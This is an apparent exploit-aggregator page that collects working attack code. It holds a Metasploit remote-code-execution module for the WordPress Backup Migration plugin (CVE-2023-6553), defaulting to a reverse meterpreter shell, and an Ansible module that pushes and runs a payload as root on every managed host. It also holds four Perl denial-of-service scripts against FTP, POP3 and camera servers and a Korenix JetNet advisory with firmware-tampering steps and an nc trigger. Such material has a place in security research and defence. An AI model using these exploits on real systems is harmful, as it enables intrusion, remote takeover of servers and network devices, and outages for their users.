Latest exploits :: CodePwn

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HTTP::Wordpress include Msf::Exploit::Remote::HTTP::PhpFilterChain include Msf::Exploit::FileDropper prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'WordPress Backup Migration Plugin PHP Filter Chain RCE', 'Description' => %q{ This module exploits an unauth RCE in the WordPress plugin: Backup Migration (<= 1.3.7). The vulnerability is exploitable through the Content-Dir header which is sent to the /wp-content/plugins/backup-backup/includes/backup-heart.php endpoint. The exploit makes use of a neat technique called PHP Filter Chaining which allows an attacker to prepend bytes to a string by continuously chaining character encoding conversions. This allows an attacker to prepend a PHP payload to a string which gets evaluated by a require statement, which results in command execution. }, 'Author' => [ 'Nex Team', # Vulnerability discovery 'Valentin Lobstein', # PoC 'jheysel-r7' # msfmodule ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2023-6553'], ['URL', 'https://github.com/Chocapikk/CVE-2023-6553/blob/main/exploit.py'], ['URL', 'https://www.synacktiv.com/en/publications/php-filters-chain-what-is-it-and-how-to-use-it'], ['WPVDB', '6a4d0af9-e1cd-4a69-a56c-3c009e207eca'] ], 'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' }, 'Platform' => ['unix', 'linux', 'win', 'php'], 'Arch' => [ARCH_PHP], 'Targets' => [['Automatic', {}]], 'DisclosureDate' => '2023-12-11', 'DefaultTarget' => 0, 'Privileged' => false, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] } ) ) register_options( [ OptString.new('PAYLOAD_FILENAME', [ true, 'The filename for the payload to be used on the target host (%RAND%.php by default)', Rex::Text.rand_text_alpha(4) + '.php']), ] ) end def check return CheckCode::Unknown unless wordpress_and_online? wp_version = wordpress_version print_status("WordPress Version: #{wp_version}") if wp_version # The plugin's official name seems to be Backup Migration however the package filename is "backup-backup" check_code = check_plugin_version_from_readme('backup-backup', '1.3.8') if check_code.code != 'appears' return CheckCode::Safe end plugin_version = check_code.details[:version] print_good("Detected Backup Migration Plugin version: #{plugin_version}") CheckCode::Appears end def send_payload(payload) php_filter_chain_payload = generate_php_filter_payload(payload) res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-content', 'plugins', 'backup-backup', 'includes', 'backup-heart.php'), 'method' => 'POST', 'headers' => { 'Content-Dir' => php_filter_chain_payload } ) fail_with(Failure::Unreachable, 'Connection failed') if res.nil? fail_with(Failure::UnexpectedReply, 'The server did not respond with the expected 200 response code') unless res.code == 200 end def write_to_payload_file(string_to_write) # Because the payload is base64 encoded and then each character is translated into it's corresponding php filter chain, # the payload becomes quite large and we start to hit limitations due to the HTTP header size. # For example this payload: "<?php fwrite(fopen("G", "a"),"\x73");?>", ends up being 7721 characters long. # The payload size limit on the target I was testing seemed to be around 8000 characters. # Using the following: <?php file_put_contents("file.php","char",FILE_APPEND);?> (more elegant solution) exceeds the # size limit which is why I ended up using <?php fwrite(fopen("<single_char_filename>", "char" ?> and then after # copying the single_char_filename to a filename with a .php extension to be executed. single_char_filename = Rex::Text.rand_text_alpha(1) string_to_write.each_char do |char| send_payload("<?php fwrite(fopen(\"#{single_char_filename}\",\"a\"),\"#{'\\x' + char.unpack('H2')[0]}\");?>") end register_file_for_cleanup(single_char_filename) send_payload("<?php copy(\"#{single_char_filename}\",\"#{datastore['PAYLOAD_FILENAME']}\");?>") register_file_for_cleanup(datastore['PAYLOAD_FILENAME']) end def trigger_payload_file res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-content', 'plugins', 'backup-backup', 'includes', datastore['PAYLOAD_FILENAME']), 'method' => 'GET' ) print_warning('The application responded to the request to trigger the payload, this is unexpected. Something may have gone wrong.') if res end def exploit print_status('Writing the payload to disk, character by character, please wait...') # Use double quotes in the payload, not single. write_to_payload_file("<?php #{payload.encoded}") trigger_payload_file end end </code></pre>

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Local Rank = GoodRanking include Msf::Post::File include Msf::Exploit::EXE include Msf::Exploit::FileDropper include Msf::Exploit::Local::Ansible prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'Ansible Agent Payload Deployer', 'Description' => %q{ This exploit module creates an ansible module for deployment to nodes in the network. It creates a new yaml playbook which copies our payload, chmods it, then runs it on all targets which have been selected (default all). }, 'License' => MSF_LICENSE, 'Author' => [ 'h00die', # msf module 'n0tty' # original PoC, analysis ], 'Platform' => [ 'linux' ], 'Stance' => Msf::Exploit::Stance::Passive, 'Arch' => [ ARCH_X86, ARCH_X64 ], 'SessionTypes' => [ 'shell', 'meterpreter' ], 'Targets' => [[ 'Auto', {} ]], 'Privileged' => true, 'References' => [ [ 'URL', 'https://github.com/n0tty/Random-Hacking-Scripts/blob/master/pwnsible.sh'], [ 'URL', 'https://web.archive.org/web/20180220031610/http://n0tty.github.io/2017/06/11/Enterprise-Offense-IT-Operations-Part-1'], ], 'DisclosureDate' => '2017-06-12', # pwnsible script but prob way before that 'DefaultTarget' => 0, 'Passive' => true, # this allows us to get multiple shells calling home 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [CONFIG_CHANGES, ARTIFACTS_ON_DISK] } ) ) register_options [ OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]), OptString.new('HOSTS', [ true, 'Which ansible hosts to target', 'all' ]), OptBool.new('CALCULATE', [ true, 'Calculate how many boxes will be attempted', true ]), OptString.new('TargetWritableDir', [ true, 'A directory where we can write files on targets', '/tmp' ]), OptInt.new('ListenerTimeout', [ true, 'The maximum number of seconds to wait for new sessions', 60 ]) ] end def module_contents(payload_name) # The `name` field in `tasks` is a required field, and it gets logged, so randomizing may be a little too obvious, I've opted for just numbers in this case. "- name: #{Rex::Text.rand_text_numeric(3..6)} hosts: #{datastore['HOSTS']} remote_user: root tasks: - name: 1 ansible.builtin.copy: src: #{datastore['WritableDir']}/#{payload_name} dest: #{datastore['TargetWritableDir']}/#{payload_name} - name: 2 ansible.builtin.file: path: #{datastore['TargetWritableDir']}/#{payload_name} owner: root group: root mode: '0700' - name: 3 command: #{datastore['TargetWritableDir']}/#{payload_name} - name: 4 file: path: #{datastore['TargetWritableDir']}/#{payload_name} state: absent " end def check return CheckCode::Safe('Ansible does not seem to be installed, unable to find ansible executable') if ansible_playbook_exe.nil? CheckCode::Appears('ansible playbook executable found') end def ping_hosts_print results = ping_hosts if results.nil? print_error('Unable to parse ping hosts results') return end columns = ['Host', 'Status', 'Ping', 'Changed'] table = Rex::Text::Table.new('Header' => 'Ansible Pings', 'Indent' => 1, 'Columns' => columns) count = 0 results.each do |match| table << [match['host'], match['status'], match['ping'], match['changed']] count += 1 if match['ping'] == 'pong' end print_good(table.to_s) unless table.rows.empty? # give the user a few seconds to cancel if its too many etc print_good("#{count} ansible hosts were pingable, and will attempt to execute payload. If this isn't an expected volume (too many), ctr+c to halt execution. Pausing 10 seconds.") Rex.sleep(10) end def exploit # Make sure we can write our exploit and payload to the local system fail_with Failure::BadConfig, "#{datastore['WritableDir']} is not writable" unless writable? datastore['WritableDir'] ping_hosts_print if datastore['CALCULATE'] payload_name = rand_text_alphanumeric(5..10) module_name = rand_text_alphanumeric(5..10) print_status('Creating yaml job to execute') yaml_file = "#{datastore['WritableDir']}/#{module_name}.yaml" write_file(yaml_file, module_contents(payload_name)) register_file_for_cleanup(yaml_file) print_status('Writing payload') upload_and_chmodx "#{datastore['WritableDir']}/#{payload_name}", generate_payload_exe register_file_for_cleanup("#{datastore['WritableDir']}/#{payload_name}") # cleanup payload on host, not targets print_status('Executing ansible job') resp = cmd_exec("#{ansible_playbook_exe} #{yaml_file}") playbook_log = store_loot('ansible.playbook.log', 'text/plain', session, resp, 'ansible.playbook.log', 'Ansible playbook log') print_good("Stored run logs to: #{playbook_log}") # stolen from exploit/multi/handler stime = Time.now.to_f timeout = datastore['ListenerTimeout'].to_i loop do break if timeout > 0 && (stime + timeout < Time.now.to_f) Rex::ThreadSafe.sleep(1) end end end </code></pre>

<pre><code>#!/usr/bin/perl use IO::Socket::INET; # Exploit Title: SpyCamLizard 1.230 - Denial of Service (DoS) # Discovery by: Fernando Mengali # Discovery Date: 18 january 2024 # Vendor Homepage: http://www.spycamlizard.com # Download to demo: https://drive.google.com/file/d/1daFgHh0VzbkDzIp41-imZbPoc6ETZDq2/view?usp=sharing # Notification vendor: Yes reported # Tested Version: SpyCamLizard 1.230 - Denial of Service (DoS) # Tested on: Window XP Professional - Service Pack 2 and 3 - English # Vulnerability Type: Denial of Service (DoS) # Vídeo: https://youtu.be/Ksg8L-ZX2Us #1. Description #His technique works fine against Windows XP Professional Service Pack 2 and 3 (English). #For this exploit I have tried several strategies to increase reliability and performance: #Jump to a static 'call esp' #Backwards jump to code a known distance from the stack pointer. #The SpyCamLizard does not correctly handle the amount of data or bytes sent. #When authenticating to the SpyCamLizard with a large number of characters for the server to process, the server will crash as soon as it is received and processed, causing denial of service conditions. #Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users. #2. Proof of Concept - PoC $sis="$^O"; if ($sis eq "windows"){ $cmd="cls"; } else { $cmd="clear"; } system("$cmd"); intro(); main(); print "[+] Exploiting... \n"; print "[+] Connecting to $ip:$port\n"; my $exploit = "x41" x 3000; my $httpsocket = IO::Socket::INET->new( PeerAddr => $host, PeerPort => $port, Proto => "tcp", ); $httpsocket->send("GET " . $exploit . " HTTP/1.0\r\n\r\n"); $httpsocket->close(); print "[+] Done - Exploited success!!!!!\n\n"; sub intro { print q { ,--, _ ___/ /\| ,;'( )__, ) ~ // // '--; ' \ | ^ ^ ^ [+] SpyCamLizard 1.230 - Denial of Service (DoS) [*] Coded by Fernando Mengali [@] e-mail: fernando.mengalli@gmail.com } } sub main { our ($ip, $port) = @ARGV; unless (defined($ip) && defined($port)) { print " \nUsage: $0 <ip> <port> \n"; exit(-1); } } </code></pre>

<pre><code>#!/usr/bin/perl use Net::FTP; # Exploit Title: Easy File Sharing FTP Server 3.6 - Denial of Service (DoS) # Discovery by: Fernando Mengali # Discovery Date: 17 january 2024 # Vendor Homepage: N/A # Download to demo: # Notification vendor: No reported # Tested Version: Easy File Sharing FTP Server 3.6 # Tested on: Window XP Professional - Service Pack 2 and 3 - English # Vulnerability Type: Denial of Service (DoS) # Vídeo: https://www.youtube.com/watch?v=U2svu2FiIVc #1. Description #His technique works fine against Windows XP Professional Service Pack 2 and 3 (English). #For this exploit I have tried several strategies to increase reliability and performance: #Jump to a static 'call esp' #Backwards jump to code a known distance from the stack pointer. #The server does not correctly handle the amount of data or bytes of the password entered by the user. #When authenticating to the FTP server with a long password or a password with a large number of characters for the server to process, the server will crash as soon as it is received and processed, causing denial of service conditions. #Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users. #2. Proof of Concept - PoC $sis="$^O"; if ($sis eq "windows"){ $cmd="cls"; } else { $cmd="clear"; } system("$cmd"); intro(); main(); print "[+] Exploiting... \n"; my $payload = "\x2c"; $payload .= "A"x2000; $payload .= "\x41"x610; my $ftp = Net::FTP->new($ip, Debug => 0) or die "Não foi possível se conectar ao servidor: $@"; $ftp->login("anonymous",$payload) or die "[+] Possibly exploited!"; $ftp->quit; print "[+] Done - Exploited success!!!!!\n\n"; sub intro { print "######################################################################\n"; print "# Easy File Sharing FTP Server 3.6 - Denied of Service #\n"; print "# #\n"; print "# Coded by Fernando Mengali #\n"; print "# #\n"; print "# e-mail: fernando.mengalli\@gmail.com #\n"; print "# #\n"; print "######################################################################\n"; } sub main { our ($ip, $port) = @ARGV; unless (defined($ip) && defined($port)) { print " \nUsage: $0 <ip> <port> \n"; exit(-1); } } #3. Solution/ How to fix: # This version product is deprecated </code></pre>

<pre><code>#!/usr/bin/perl use IO::Socket::INET # Exploit Title: MailCarrier 2.51 - Denial of Service (DoS) # Discovery by: Fernando Mengali # Discovery Date: 16 january 2024 # Tested Version: MailCarrier 2.51 # Tested on: Window XP Professional - Service Pack 2 and 3 - English # Vulnerability Type: Denial of Service (DoS) #1. Description #His technique works fine against Windows XP Professional Service Pack 2 and 3 (English). #For this exploit I have tried several strategies to increase reliability and performance: #Jump to a static 'call esp' #Backwards jump to code a known distance from the stack pointer. #The server does not correctly handle the amount of data or bytes of the USERNAME entered by the user. #When authenticating to the POP3 server with a long USERNAME or a USERNAME with a large number of characters for the POP3 server to process, the server will crash as soon as it is received and processed, causing denial of service conditions. #Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users. #2. Proof of Concept - PoC $sis="$^O"; if ($sis eq "windows"){ $cmd="cls"; } else { $cmd="clear"; } system("$cmd"); intro(); main(); print "[+] Exploiting... \n"; my $buf = "\x41" x 6000; my $s = IO::Socket::INET->new( PeerAddr => $ip, PeerPort => $port, Proto => 'tcp' ) or die "Unable to connect: $!\n"; $s->recv(my $data, 1024); # Grab banners (if any) $s->send('USER ' . $buf . "\r\n"); $s->recv(my $response, 1024); $s->send("QUIT\r\n"); $s->close(); print "[+] Done - Exploited success!!!!!\n\n"; sub intro { print q { ,--, _ ___/ /\| ,;'( )__, ) ~ // // '--; ' \ | ^ ^ ^ [+] MailCarrier 2.51 - Denial of Service (DoS) [*] Coded by Fernando Mengali [@] e-mail: fernando.mengalli@gmail.com } } sub main { our ($ip, $port) = @ARGV; unless (defined($ip) && defined($port)) { print " \nUsage: $0 <ip> <port> \n"; exit(-1); } } #3. Solution/ How to fix: # This version product is deprecated </code></pre>

<pre><code>#!/usr/bin/perl use Net::FTP; # Exploit Title: LightFTP 1.1 - Denial of Service (DoS) # Discovery by: Fernando Mengali # Discovery Date: 15 january 2024 # Vendor Homepage: N/A # Notification vendor: No reported # Tested Version: LightFTP 1.1 # Tested on: Window XP Professional - Service Pack 2 and 3 - English # Vulnerability Type: Denial of Service (DoS) #1. Description #His technique works fine against Windows XP Professional Service Pack 2 and 3 (English). #For this exploit I have tried several strategies to increase reliability and performance: #Jump to a static 'call esp' #Backwards jump to code a known distance from the stack pointer. #The server does not correctly handle the amount of data or bytes of the USERNAME entered by the user. #When authenticating to the FTP server with a long USERNAME or a USERNAME with a large number of characters for the FTP server to process, the server will crash as soon as it is received and processed, causing denial of service conditions. #Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users. #2. Proof of Concept - PoC $sis="$^O"; if ($sis eq "windows"){ $cmd="cls"; } else { $cmd="clear"; } system("$cmd"); intro(); main(); print "[+] Exploiting... \n"; my $payload = "\x41"x500; my $ftp = Net::FTP->new($ip, Debug => 0) or die "Não foi possível se conectar ao servidor: $@"; $ftp->login($payload,"anonymous") or die "[+] Possibly exploited!"; $ftp->quit; print "[+] Done - Exploited success!!!!!\n\n"; sub intro { print q { ,--, _ ___/ /\| ,;'( )__, ) ~ // // '--; ' \ | ^ ^ ^ [+] LightFTP 1.1 - Denial of Service (DoS) [*] Coded by Fernando Mengali [@] e-mail: fernando.mengalli@gmail.com } } sub main { our ($ip, $port) = @ARGV; unless (defined($ip) && defined($port)) { print " \nUsage: $0 <ip> <port> \n"; exit(-1); } } #3. Solution/ How to fix: # This version product is deprecated </code></pre>

<pre><code>CyberDanube Security Research 20240109-0 ------------------------------------------------------------------------------- title| Multiple Vulnerabilities product| Korenix JetNet Series vulnerable version| See "Vulnerable versions" fixed version| - CVE number| CVE-2023-5376, CVE-2023-5347 impact| High homepage| https://www.korenix.com/ found| 2023-08-31 by| S. Dietz (Office Vienna) | CyberDanube Security Research | Vienna | St. Pölten | | https://www.cyberdanube.com ------------------------------------------------------------------------------- Vendor description ------------------------------------------------------------------------------- "Korenix Technology, a Beijer group company within the Industrial Communication business area, is a global leading manufacturer providing innovative, market- oriented, value-focused Industrial Wired and Wireless Networking Solutions. With decades of experiences in the industry, we have developed various product lines [...]. Our products are mainly applied in SMART industries: Surveillance, Machine-to- Machine, Automation, Remote Monitoring, and Transportation. Worldwide customer base covers different Sales channels, including end-customers, OEMs, system integrators, and brand label partners. [...]" Source: https://www.korenix.com/en/about/index.aspx?kind=3 Vulnerable versions ------------------------------------------------------------------------------- Tested on emulated Korenix JetNet 5310G / v2.6 All vulnerable models/versions according to vendor: JetNet 4508 (4508i-w V1.3, 4508 V2.3, 4508-w V2.3) JetNet 4508f, 4508if (4508if-s V1.3,4508if-m V1.3, 4508if-sw V1.3, 4508if-mw V1.3, 4508f-m V2.3, 4508f-s V2.3, 4508f-mw V2.3, 4508f-sw V2.3) JetNet 5620G-4C V1.1 JetNet 5612GP-4F V1.2 JetNet 5612G-4F V1.2 JetNet 5728G (5728G-24P-AC-2DC-US V2.1, 5728G-24P-AC-2DC-EU V2.0) JetNet 528Gf (6528Gf-2AC-EU V1.0, 6528Gf-2AC-US V1.0, 6528Gf-2DC24 V1.0, 6528Gf-2DC48 V1.0, 6528Gf-AC-EU V1.0, 6528Gf-AC-US V1.0) JetNet 6628XP-4F-US V1.1 JetNet 6628X-4F-EU V1.0 JetNet 6728G (6728G-24P-AC-2DC-US V1.1, 6728G-24P-AC-2DC-EU V1.1) JetNet 6828Gf (6828Gf-2DC48 V1.0, 6828Gf-2DC24 V1.0, 6828Gf-AC-DC24-US V1.0, 6828Gf-2AC-US V1.0, 6828Gf-AC-US V1.0, 6828Gf-2AC-AU V1.0, 6828Gf-AC-DC24-EU V1.0, 6828Gf-2AC-EU V1.0) JetNet 6910G-M12 HVDC V1.0 JetNet 7310G-V2 2.0 JetNet 7628XP-4F-US V1.0, 7628XP-4F-US V1.1, 7628XP-4F-EU V1.0, 7628XP-4F-EU V1.1 JetNet 7628X-4F-US V1.0, 7628X-4F-EU V1.0 JetNet 7714G-M12 HVDC V1.0 Vulnerability overview ------------------------------------------------------------------------------- 1) TFTP Without Authentication (CVE-2023-5376) The available tftp service is accessable without user authentication. This allows the user to upload and download files to the restricted "/home" folder. 2) Unauthenticated Firmware Upgrade (CVE-2023-5347) A critical security vulnerability has been identified that may allow an unauthenticated attacker to compromise the integrity of a device or cause a denial of service (DoS) condition. This vulnerability resides in the firmware upgrade process of the affected system. Proof of Concept ------------------------------------------------------------------------------- 1) TFTP Without Authentication (CVE-2023-5376) The Linux tftp client was used to upload a firmware to the absolute path "/home/firmware.bin": # tftp $IP tftp> put exploit.bin /home/firmware.bin Sent 5520766 bytes in 5.7 seconds 2) Unauthenticated Firmware Upgrade (CVE-2023-5347) Unauthenticated attackers can exploit this by uploading malicious firmware via TFTP and initializing the upgrade process with a crafted UDP packet on port 5010. We came to the conclusion that the firmware image consists of multiple sections. Our interpretation of these can be seen below: =============================================================================== class FirmwarePart: def init(self, name, offset, size): self.name = name self.offset = offset self.size = size firmware_parts = [ FirmwarePart("uimage_header", 0x0, 0x40), FirmwarePart("uimage_kernel", 0x40, 0x3c54), FirmwarePart("gzip", 0x3c94, 0x14a000 - 0x3c94), FirmwarePart("squashfs", 0x14a000, 0x539000 - 0x14a000), FirmwarePart("metadata", 0x539000, 5480448 - 0x539000), ] =============================================================================== The squashfs includes the rootfs. Metadata includes a 4 byte checksum which needs to be modified when repacked. During our analysis we observed that the checksum gets calculated over all sections except metadata. To test this vulnerability we reimplemented the checksum calculation at offset 0x9bdc in the binary "/bin/cmd-server2": =============================================================================== #include <stdio.h> #include <stdint.h> #include <stdlib.h> int32_t check_file(const char* arg1) { FILE* r0 = fopen(arg1, "rb"); if (!r0) { return 0xffffffff; } int32_t filechecksum = 0; int32_t last_data_size = 0; int32_t file_size = 0; uint8_t data_buf[4096]; int32_t data_len = 1; while (data_len > 0) { data_len = fread(data_buf, 1, sizeof(data_buf), r0); if (data_len == 0) { break; } int32_t counter = 0; while (counter < (data_len >> 2)) { int32_t byte_at_counter = *((int32_t*)(data_buf + (counter << 2))); counter++; filechecksum += byte_at_counter; } file_size += data_len; last_data_size = data_len; } fclose(r0); if (last_data_size < 0x400 || (last_data_size >= 0x400 && (file_size - 0x14a 000) > 0x5ac000)) { return 0xffffffff; } data_len = 0; while (data_len < (last_data_size >> 2)) { int32_t r3_2 = *((int32_t*)(data_buf + (data_len << 2))); data_len++; filechecksum -= r3_2; } return filechecksum; } int main(int argc, char* argv[]) { if (argc != 2) { printf("Usage: %s <file_path>\n", argv[0]); return 1; } int32_t result = check_file(argv[1]); printf("0x%x\n", result); return 0; } =============================================================================== After modifying and repacking the squashfs, we calculated the checksum, patched the required bytes in the metadata section (offset 0x11b-0x11e) and initilized the update process. =============================================================================== # tftp $IP tftp> put exploit.bin /home/firmware.bin Sent 5520766 bytes in 5.7 seconds # echo -e "\x00\x00\x00\x1f\x00\x00\x00\x01\x01" | nc -u $IP 5010 =============================================================================== The output of the serial console can be observed below: =============================================================================== Jan 1 00:01:00 Jan 1 00:01:00 syslog: UDP cmd is received Jan 1 00:01:00 Jan 1 00:01:00 syslog: management vlan = sw0.0 Jan 1 00:01:00 Jan 1 00:01:00 syslog: setsockopt(SO_BINDTODEVICE) No such devi Jan 1 00:01:00 Jan 1 00:01:00 syslog: tlv_count = 0 Jan 1 00:01:00 Jan 1 00:01:00 syslog: rec_bytes = 10 Jan 1 00:01:00 Jan 1 00:01:00 syslog: command TLV_FW_UPGRADE received check firmware... checksum=b2256313, inFileChecksum=b2256313 Firmware upgrading, don't turn off the switch! Begin erasing flash: . Write firmware.bin (5480448 Bytes) to flash: ... Write finished... Terminating child processes... Jan 1 00:01:01 Jan 1 00:01:01 syslog: first time create tlv_chain Jan 1 00:01:01 syslogd exiting Firmware upgrade success!! waiting for reboot command ....... =============================================================================== The vulnerabilities were manually verified on an emulated device by using the MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com). Solution ------------------------------------------------------------------------------- Beijer/Korenix provided a workaround to mitigate the vulnerabilities until a proper patch is available (see "Workaround" section). Workaround ------------------------------------------------------------------------------- Beijer representatives provided the following workaround for mitigating the vulnerabilities on devices of the JetNet series: "Login by terminal: Switch# configure terminal Switch(config)# service ipscan disable Switch(config)# tftpd disable Switch(config)# copy running-config startup-config " Source: https://www.beijerelectronics.com/en/support/Help___online?docId=69947 This commands should be used to deactivate the TFTP daemon on the device to prevent unauthenticated actors from abusing the service. Recommendation ------------------------------------------------------------------------------- Regardless to the current state of the vulnerability, CyberDanube recommends customers from Korenix to upgrade the firmware to the latest version available. Furthermore, a full security review by professionals is recommended. Contact Timeline ------------------------------------------------------------------------------- 31-08-2023: Contacting Beijer Electronics Group via cs@beijerelectronics.com. 31-08-2023: Receiving contact information. Send vulnerability information. 26-09-2023: Asking about vulnerability status and receiving update release date. 27-10-2023: Received update from contact regarding the firmware update. 29-11-2023: Meeting with contact stating that it effects the whole series. 31-11-2023: Meeting to discuss potential solutions. 11-12-2023: Release delayed due to lack of workaround from manufacturer. 21-12-2023: Manufacturer provides workaround. Release date confirmed. 09-01-2024: Coordinated release of security advisory. Web: https://www.cyberdanube.com Twitter: https://twitter.com/cyberdanube Mail: research at cyberdanube dot com EOF Sebastian Dietz / @2024 </code></pre>